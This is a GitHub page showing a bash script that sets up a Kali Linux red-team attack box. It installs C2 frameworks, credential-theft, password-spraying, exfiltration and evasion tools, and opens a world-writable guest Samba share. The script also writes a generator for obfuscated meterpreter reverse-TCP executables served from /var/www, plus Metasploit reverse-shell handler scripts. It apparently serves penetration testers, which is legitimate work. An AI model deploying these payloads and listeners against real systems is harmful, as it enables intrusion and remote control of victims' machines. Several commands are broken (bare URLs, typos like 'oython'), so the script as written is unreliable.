-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathkali_setup.sh
391 lines (315 loc) · 11.5 KB
/
kali_setup.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
#!/bin/bash
Kali Initial Build Script
wget https://http.kali.org/kali/pool/main/k/kali-archive-keyring/kali-archive-keyring_2018.1_all.deb
apt install ./kali-archive-keyring_2018.1_all.deb
#initial commands
apt-get clean && apt-get update && apt-get upgrade -y && apt-get dist-upgrade -y
#basic installs
apt-get install python-setuptools
easy_install pip
pip install selenium
apt-get install unrar jxplorer unace rdate krb5-user rar libssl1.0-dev libxml2-dev zlib1g-dev unrar p7zip zip unzip p7zip-full p7zip-rar file-roller nfs-acl-tools freetds-dev bloodhound cadaver csvtool bkhive bettercap creddump creddump7 exiftool fierce htop gobuster html2text ipcalc masscan mimikatz mingw-w64 ldap-utils rsh-client finger linux-exploit-suggester neo4j nishang nfs-common recon-ng rinetd samdum2 seclists smbclient sshuttle sshpass tree wce websploit unicorn-magic xdmcp xwd remmina remmina-plugin-xdmcp -y
# Posh C2 & Supporting Modules
cd /opt
git clone https://github.com/nettitude/PoshC2_Python.git
cd PoshC2_Python
chmod +x ./Install.sh
./Install.sh
#msfconsole.rc
#
echo "spool /mylog.log" >> /msfconsole.rc
echo "set consolelogging true" >> /msfconsole.rc
echo "set loglevel 5" >> /msfconsole.rc
echo "set sessionlogging true" >> /msfconsole.rc
echo "set timestampoutput true" >> /msfconsole.rc
echo 'setg prompt "%cya%T%grn S:%S%blu J:%J "' >> /msfconsole.rc
# TO DO - this bit needs tweaking for latest java stuff
#Install Oracle for Cobalt Strike
#Credit for this section of bash script goes to @_RastaMouse
mkdir /usr/local/java
curl -s -j -L -H "Cookie: oraclelicense=accept-securebackup-cookie" http://download.oracle.com/otn-pub/java/jdk/8u144-b01/090f390dda5b47b9b721c7dfaa008135/jdk-8u144-linux-x64.tar.gz -o /usr/local/java/jdk-8u144-linux-x64.tar.gz
cd /usr/local/java
tar zxf jdk-8u144-linux-x64.tar.gz
echo "JAVA_HOME=/usr/local/java/jdk1.8.0_144" >> /etc/profile
echo "JRE_HOME=/usr/local/java/jdk1.8.0_144/jre" >> /etc/profile
echo "PATH=$PATH:/usr/local/java/jdk1.8.0_144/bin:/usr/local/java/jdk1.8.0_144/jre/bin" >> /etc/profile
echo "export JAVA_HOME" >> /etc/profile
echo "export JRE_HOME" >> /etc/profile
echo "export PATH" >> /etc/profile
update-alternatives --install "/usr/bin/java" "java" "/usr/local/java/jdk1.8.0_144/bin/java" 1
update-alternatives --install "/usr/bin/javaws" "javaws" "/usr/local/java/jdk1.8.0_144/bin/javaws" 1
update-alternatives --set java /usr/local/java/jdk1.8.0_144/bin/java
update-alternatives --set javaws /usr/local/java/jdk1.8.0_144/bin/javaws
rm /usr/local/java/jdk-8u144-linux-x64.tar.gz
git clone https://github.com/rsmudge/Malleable-C2-Profiles.git /opt/cobaltstrike/MalleableC2
##Manually grab latest CS and update - no CS licence key here ^_^
#CredChecker
cd /opt
git clone https://github.com/Raikia/CredNinja.git
#sipvicious
cd /opt
git clone https://github.com/sandrogauci/sipvicious.git
#Empire
cd /opt
git clone https://github.com/PowerShellEmpire/Empire.git
#run setup manually.
#LinkedInt
cd /opt
git clone https://github.com/mdsecactivebreach/LinkedInt.git
#AWS Buckets
cd /opt
git clone https://github.com/W00t3k/inSp3ctor.git
#Chameleon - Avoid Proxy Filter
cd /opt
git clone https://github.com/mdsecactivebreach/Chameleon.git
#ICMP Tunnels
cd /opt
git clone https://github.com/inquisb/icmpsh.git
#HTA
cd /opt
git clone https://github.com/nccgroup/demiguise.git
#Quick HTTP Wins
cd /opt
git clone https://github.com/ConsciousHacker/EyeWitness.git
#Sharepoint Enumeration
cd /opt
git clone https://github.com/sensepost/SPartan.git
#LyncSmash
cd /opt
git clone https://github.com/nyxgeek/lyncsmash.git
#SubDomain Enumeration
cd /opt
git clone https://github.com/aboul3la/Sublist3r.git
#SpiderFoot
cd /opt
git clone https://github.com/smicallef/spiderfoot.git
#SOAP-UI
cd /opt
wget -q https://s3.amazonaws.com/downloads.eviware/soapuios/5.4.0/SoapUI-x64-5.4.0.sh -o /tmp/soapui-x64-5.4.0.sh && \
/tmp/soapui-x64-5.4.0.sh
# Pret
cd /opt
git clone https://github.com/RUB-NDS/PRET.git
#Snarf
#
apt-get install nodejs
cd /opt
git clone https://github.com/purpleteam/snarf.git
#Unicorn
cd /opt
git clone https://github.com/trustedsec/unicorn.git
#Veil-Evasion setup
#
cd /opt
git clone https://github.com/Veil-Framework/Veil.git
git clone https://github.com/Veil-Framework/PowerTools.git
echo "[!] Don't forget at the end to run the installer manually!"
# PoshC2
cd /opt
git clone https://github.com/nettitude/PoshC2_Python.git
#Responder Setup
rm -r /usr/share/responder
rm /usr/bin/responder
cd /opt
git clone https://github.com/SpiderLabs/Responder.git
cd Responder
cp -r * /usr/bin
#Impacket Setup
cd /opt
https://github.com/SecureAuthCorp/impacket.git
cd impacket
pip install .
cp /opt/impacket/examples/smbrelayx.py /usr/bin
chmod 755 /usr/bin/smbrelayx.py
cp /opt/impacket/examples/goldenPac.py /usr/bin
chmod 755 /usr/bin/goldenPac.py
#Payload Generation
#
cd /opt
git clone https://github.com/trustedsec/unicorn.git
echo '#!/bin/bash' >> /payload_gen.sh
echo "ADDY=$(ifconfig eth0 | awk '/inet addr/{print $2}' | awk -F':' '{print $2}')" >> /payload_gen.sh
echo 'cd /root/payload_temp' >> /payload_gen.sh
echo 'python /opt/Veil-Evasion/Veil-Evasion.py -p python/meterpreter/rev_tcp -c compile_to_exe=Y use_pyherion=Y LHOST=$ADDY LPORT=443 --overwrite' >> /payload_gen.sh
echo 'sleep 1' >> /payload_gen.sh
echo 'mv -f /root/veil-output/compiled/payload.exe /var/www/FreshPayload.exe' >> /payload_gen.sh
#msf Resource Scripts
#
echo "use multi/handler" >> /bounce
echo "jobs -K" >> /bounce
echo "set payload windows/meterpreter/reverse_tcp" >> /bounce
echo "set exitonsession false" >> /bounce
echo "set lport 443" >> /bounce
echo "set enablestageencoding true" >> /bounce
echo "set autorunscript migrate -f" >> /bounce
echo "set LHOST 0.0.0.0" >> /bounce
echo "exploit -j -z" >> /bounce
echo "use multi/handler" >> /bouncessl
echo "jobs -K" >> /bouncessl
echo "set payload windows/meterpreter/reverse_https" >> /bouncessl
echo "set exitonsession false" >> /bouncessl
echo "set lhost 0.0.0.0" >> /bouncessl
echo "set lport 443" >> /bouncessl
echo "set enablestageencoding true" >> /bouncessl
echo "set autorunscript migrate -f" >> /bouncessl
echo "exploit -j -z" >> /bouncessl
#foofus OWA enum scripts
#
mkdir -p /opt/foofus
cd /opt/foofus
wget http://www.foofus.net/jmk/tools/owa/OWALogonBrute.pl
wget http://www.foofus.net/jmk/tools/owa/OWA55EnumUsersURL.pl
wget http://www.foofus.net/jmk/tools/owa/OWALightFindUsers.pl
wget http://www.foofus.net/jmk/tools/owa/OWAFindUsers.pl
wget http://www.foofus.net/jmk/tools/owa/OWAFindUsersOld.pl
#Shell_Shocker Setup
cd /opt
git clone https://github.com/mubix/shellshocker-pocs.git
# MAC ADDITIONS
#Powersploit Stuff
# apt-get install powersploit
# PowerSploit is inside Kali Apt-get but the kali repo versiono doesnt include PowerView and PowerUp
git clone https://github.com/PowerShellMafia/PowerSploit.git /opt/powersploit &> /dev/null
if [ $? -eq 0 ]; then item_success "Installed PowerSploit"; else item_failure "Installed PowerSploit"; fi
# PowerSploit Extras
cd /usr/share/powersploit/
wget -q https://raw.githubusercontent.com/obscuresec/random/master/StartListener.py
wget -q https://raw.githubusercontent.com/darkoperator/powershell_scripts/master/ps_encoder.py
cd /opt/powersploit/
wget -q https://raw.githubusercontent.com/obscuresec/random/master/StartListener.py
wget -q https://raw.githubusercontent.com/darkoperator/powershell_scripts/master/ps_encoder.py
# PSNmap
cd /opt wget -q https://www.powershelladmin.com/w/images/3/3e/PSnmap.zip -O /tmp/psnmap.zip && \
unzip /tmp/psnmap.zip -d /opt/ &> /dev/null
#Printer Exploits
cd /opt
git clone https://github.com/TheEvilSaint/praedasploit.git
#DNSCat
cd /opt
git clone https://github.com/lukebaggett/dnscat2-powershell.git
#DomainPasswordSpray
cd /opt
git clone https://github.com/dafthack/DomainPasswordSpray.git
#Atomic-Red-Team
cd /opt
git clone https://github.com/redcanaryco/atomic-red-team.git
#NCC's Cisco Enumeration
cd /opt
git clone https://github.com/nccgroup/cisco-SNMP-enumeration.git
#CTFR - Certificate Transparency Enumeration
cd /opt
git clone https://github.com/UnaPibaGeek/ctfr.git
cd ctft
pip3 install -r requirements.txt
#DET - Data Exfil Toolkit
cd /opt
git clone https://github.com/sensepost/DET.git
cd DET
pip install -r requirements.txt --user
#NCC Frogger
cd /opt
git clone https://github.com/nccgroup/vlan-hopping---frogger.git
mv vlan-hopping---frogger frogger
cd frogger
chmod +x frogger
#HeartBleed Script
cd /opt
git clone https://github.com/OffensivePython/HeartLeak.git
#PowerSCCM
cd /opt
https://github.com/PowerShellMafia/PowerSCCM.git
#impacket (always fun!)
cd /opt
git clone https://github.com/CoreSecurity/impacket.git
cd impacket
oython setup.py install
pip install .
pip install -r requirements_examples.txt
python setup.py
#SprayWMI
cd /opt
git clone https://github.com/trustedsec/spraywmi.git
mv /opt/spraywmi/wmis /opt/spraywmi/wmis.old
cp /usr/bin/pth-wmis /opt/spraywmi/wmis
#PowerShell PopUp 1
cd /opt
git clone https://github.com/burntmacncheese/Powershell-PopupBox.git
cd /opt
https://github.com/cheetz/PowerShell_Popup.git
#UnixWiz NBTScan
cd /opt
mkdir nbtscan
cd nbtscan
wget --timeout=5 --waitretry=3 --tries=3 http://www.unixwiz.net/tools/nbtscan-1.0.35-redhat-linux
chmod +x nbtscan-1.0.35-redhat-linux
#LyncSniper
cd /opt
https://github.com/mdsecresearch/LyncSniper.git
#DirSearch
cd /opt
git clone https://github.com/maurosoria/dirsearch.git
#MailSniper
cd /opt
git clone https://github.com/dafthack/MailSniper.git
#MorphHTA
cd /opt
git clone https://github.com/vysec/morphHTA.git
#MSDAT
cd /opt
git clone https://github.com/quentinhardy/msdat.git
#MDSEC SharpShooter - Payload Generation
cd /opt
git clone https://github.com/mdsecactivebreach/SharpShooter.git
#Splunk Malicious Pentest App
cd /opt
git clone https://github.com/tevora-threat/splunk_pentest_app.git
#SSH Audit
cd /opt
git clone https://github.com/arthepsy/ssh-audit.git
#PowerSploit Setup
cd /opt
git clone https://github.com/mattifestation/PowerSploit.git
#Applocker Bypasses
cd /opt
git clone https://github.com/api0cradle/UltimateAppLockerByPassList.git
#PowerTools Setup
cd /opt
git clone https://github.com/Veil-Framework/PowerTools.git
cp /opt/PowerTools/PowerUp/PowerUp.ps1 /var/www
cp /opt/PowerTools/PowerView/powerview.ps1 /var/www
#Iodine Windows Client
cd /opt
mkdir Iodine_Windows_Client && cd Iodine_Windows_Client
wget --timeout=5 --waitretry=3 --tries=3 http://code.kryo.se/iodine/iodine-0.7.0-windows.zip
#Pykek Setup
cd /opt
git clone https://github.com/bidord/pykek.git
#carlos perez's asdi scripts
#
cd /opt
git clone https://github.com/darkoperator/Meterpreter-Scripts.git carlos-perez-meterpreter
cd carlos-perez-meterpreter
mkdir -p ~/.msf4/modules/post/windows/gather
cp post/windows/gather/* ~/.msf4/modules/post/windows/gather/
#autoconnect MSF db
update-rc.d postgresql enable
update-rc.d metasploit enable
#setup samba
mkdir /srv/kali
chmod 777 /srv/kali
echo "[kali]" >> /etc/samba/smb.conf
echo " comment = Kali share" >> /etc/samba/smb.conf
echo " path = /srv/kali" >> /etc/samba/smb.conf
echo " browseable = yes" >> /etc/samba/smb.conf
echo " public = yes" >> /etc/samba/smb.conf
echo " writable = yes" >> /etc/samba/smb.conf
echo " guest ok = yes" >> /etc/samba/smb.conf
#cleanup
#
updatedb
apt-get clean && apt-get update && apt-get upgrade -y && apt-get dist-upgrade -y
echo
echo "[!] You also need to install Go from https://golang.org/dl/ and then run 'go get github.com/bettercap/bettercap'"
echo "[!] You must run the setup on Empire manually at /opt/Empire and Veil at /opt/Veil"
echo "[!] Grab latest Mimikatz: https://github.com/gentilkiwi/mimikatz/releases "
echo "[!] Grab latest Nessus Pro and BurpSuitePro too. "